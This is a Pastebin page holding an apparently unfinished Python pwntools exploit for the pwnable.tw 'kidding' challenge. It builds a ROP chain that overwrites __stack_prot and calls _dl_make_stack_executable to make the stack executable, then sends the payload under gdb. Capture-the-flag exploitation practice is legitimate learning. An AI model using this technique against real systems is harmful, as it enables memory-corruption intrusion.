Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- local = True
- if local:
- r = process("./kidding")
- else:
- # nc chall.pwnable.tw 10303
- r = remote("chall.pwnable.tw", 10303)
- padding = "a"*0x10
- libc_stack_end = 0x080e9fc8
- stack_prot = 0x080e9fec
- stack_executable = 0x0809a080
- # 0x080b8536 : pop eax ; ret
- pop_eax_ret = 0x080b8536
- # 0x0805462b : mov dword ptr [edx], eax ; ret
- mov_ret = 0x0805462b
- # 0x0806ec8b : pop edx ; ret
- pop_edx_ret = 0x0806ec8b
- payload = padding + p32(pop_eax_ret) + p32(7)
- payload += p32(pop_edx_ret) + p32(stack_prot)
- payload += p32(mov_ret)
- payload += p32(pop_eax_ret) + p32(libc_stack_end)
- payload += p32(stack_executable) + p32(0x61616161)
- gdb.attach(r)
- r.sendline(payload)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement